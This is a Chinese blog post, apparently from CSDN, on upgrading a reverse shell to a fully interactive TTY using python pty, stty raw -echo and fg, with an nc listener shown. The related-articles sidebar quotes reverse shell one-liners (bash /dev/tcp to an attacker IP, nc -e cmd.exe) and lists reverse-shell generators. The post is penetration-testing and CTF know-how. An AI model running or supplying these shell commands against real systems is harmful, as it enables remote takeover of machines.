Reverse shell升级成 完全交互式 TTY

最新推荐文章于 2023-05-16 11:14:39 发布
最新推荐文章于 2023-05-16 11:14:39 发布
阅读量3k 收藏 5
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43851945/article/details/104070423
版权

Reverse shell升级成交互式 TTY

作者: Ikonw

正常来说普通的reverse shell 都有以下的一些缺点

  • 无法使用的文本管理器 比如 VI
  • 没有Tab键自动完成(痛苦啊)
  • 不能用上下方向键 来选择历史记录(每次输错了都要重新打啊)
  • su 无法执行
  • 如果shell卡住的话 按ctrl + c 会直接导致你的shell 死亡

这边我举个例子
在这里插入图片描述
可以利用 python 的 pty 模块升级成 pty.

which python
python -c 'import pty;pty.spawn("/bin/bash")'

这边虽然有一个挺好看的界面,但还是有以上的问题。
在这里插入图片描述
这时候可以升级成 完全交互式的TTY

// 在pty shell里面
ctrl + z
[1]+  Stopped                 nc -nvlp 1234

// Kali Terminal
stty raw -echo

//出现在下一行 这时候输入东西 无法显示 
fg

//连按两次 Enter

在这里插入图片描述
现在我们要让我们的tty 跟我们kali 的terminal 一致。
在这里插入图片描述

export TERM=xterm-256color  //注意大小写
stty rows 28 columns 86 // rows和columns看自己喜好。

在这里插入图片描述
现在我们已经升级成完全交互式TTY,可以正常的使用命令 比如 clear, vim,ssh,上下键 之类的。
如果不流畅的现象,说明主机跟目标机子存在延迟,所以会有明显卡顿。

Ikonw 星辰
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
reverse-shell-generator:简单的脚本来生反向shell
04-10
我用Python编写的一个简单脚本可立即生反向shell。 您不需要每次都打开Goog​​le,呵呵。 安装 1. Clone the Repository: git clone https://github.com/SoftwareUser23/reverse-shell-generator 2. Change the Directory: cd reverse-shell-generator 3. Install Dependencies: pip3 install -r requirements.txt 4. Run the Python-file: python3 main.py 通过脚本安装: chmod +x install.sh ./install.sh 完毕! 由SoftwareUser23充满爱 :red_heart: 。
ssh升级
weixin_30379531的博客
12-23 70
Openssh升级操作步骤(此方法仅供参考) 1、开启telnet服务 未避免openssh升级失败,导致ssh无法连接,在升级前首先开启telnet服务。 首先要确定是否安装了telnet 修改配置文件vi /etc/xinetd.d/telnet disable=no (yes改为no) 有的机子不允许root直接登录telnet可在 默认情况不能用root身份登陆!!!...
Openssh 升级
yonghutwo的专栏
05-13 1333
环境: [root@localhost /]# cat /etc/redhat-release CentOS Linux release 7.7.1908 (Core)[root@localhost /]# ssh -V OpenSSH_7.4p1, OpenSSL 1.0.2k-fips 26 Jan 2017 整个过程不需要卸载原先的openssl包和openssh的rpm包。不影响我们的操作。 前期准备: 1、安装telnet-server以及xinetd,防止升级失败无法连接远程服务器..
实现交互式shell的几种方式:python pty 方式、升级nc、socat、script获取pty
热门推荐
闵行小鱼塘
06-04 1万+
当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。 那我们怎么获取一个可交互的webshell呢?
各种shell反弹方法
weixin_46626737的博客
05-16 1560
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
将简单的shell升级完全交互式TTY
weixin_34413357的博客
09-13 1202
本文讲的是将简单的shell升级完全交互式TTY,每个pentester都知道,当用netcat反弹一个反向shell并且看到详细的netcat消息跟输出时,这种感觉爽歪歪。 当然他们也知道shell丢失时的沮丧,运行了一个不好的命令,挂起并且意外地击中“Ctrl-C”,认为它会阻止它,其实是杀死整个连接。 除了没有正确处理SIGINT之外,...
Windows下反弹shell的方式
ws1813004226的博客
05-25 5289
一、Windows下反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
【工具分享】-反弹Shell在线编写工具
一只爱吃橙子的羊
04-18 1497
反弹Shell在线编写工具(可以作为离线版)
reverse-shell-generator:托管的具有大量功能的Reverse Shell器。 -(非常适合CTF)
03-03
反向壳发生器 托管反向Shell器,具有大量功能,非常适合CTF 特征 生公共侦听器和反向外壳 自动复制到剪贴板 用于将侦听端口号增加1的按钮 URI和Base64编码 LocalStorage保留您的配置 暗光模式 截屏 托管实例
Nim-Reverse-Shell:交互式Windows Reverse Shell ServerClient
05-21
逆向弹壳 Windows的交互式反向外壳(服务器也可以在Linux上运行)
reverse-shell-generator:基于Web的反向shell
02-05
reverse-shell-generator:基于Web的反向shell
自动生适用于Linux或Windows受害者的完全交互的反向外壳-Golang开发
05-26
Girsh(Golang交互式反向外壳)谁不厌倦手动键入几行以将反向外壳升级为完整的交互式反向器Girsh(Golang交互式反向外壳)谁不厌倦手动键入几行以进行升级将反向shell转换为完全交互式反向shelltty,stty大小...,stty raw -echo)或键入命令以使用ConPTY。 描述使用Girsh,只需运行它,它将检测操作系统并执行正确的命令以将其升级到完整的交互式反向Shell。 对于Linux:获取终端的大小使用python2.7,python3和python生tty更改终端为raw
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
Reverseshell:一个反向shell应用程序,用于远程运行系统命令
04-04
反壳一个反向程序应用程序,用于运行使用套接字和泡菜远程编写的系统命令。
php-reverse-shell
07-24
php-reverse-shell
简述Android应用安装的拷贝过程
m0_46250244的博客
02-18 1739
Android安装过程会区分为预置应用和三方应用,预置应用在首次开机过程中便会扫描安装,而三方应用则由用户使用过程中来完安装。 安装的方式主要分为以下几种: 安装预置应用,这部分在首次开机完; 使用ADB命令或者Shell命令来完,其过程相同,ADB会增加一层ADB调用; 通过应用商店或者在其他应用内下载安装; 在文件管理中或者浏览器中点击APK文件通过PackageInstaller包进...
windows反弹shell复现
就是我的博客
04-06 9597
windows反弹shell 简介: reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1243
什么是反弹shell? 反弹shellreverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2306
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
windows/x64/shell/reverse_tcp 无法连接
最新发布
05-22
set PAYLOAD windows/x64/shell/reverse_tcp set LHOST set LPORT run ``` 如果功建立 Session,说明 Payload 的生和传输没有问题,但是可能是目标主机的防病毒软件或系统安全配置拦截了反向连接,需要进一步...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值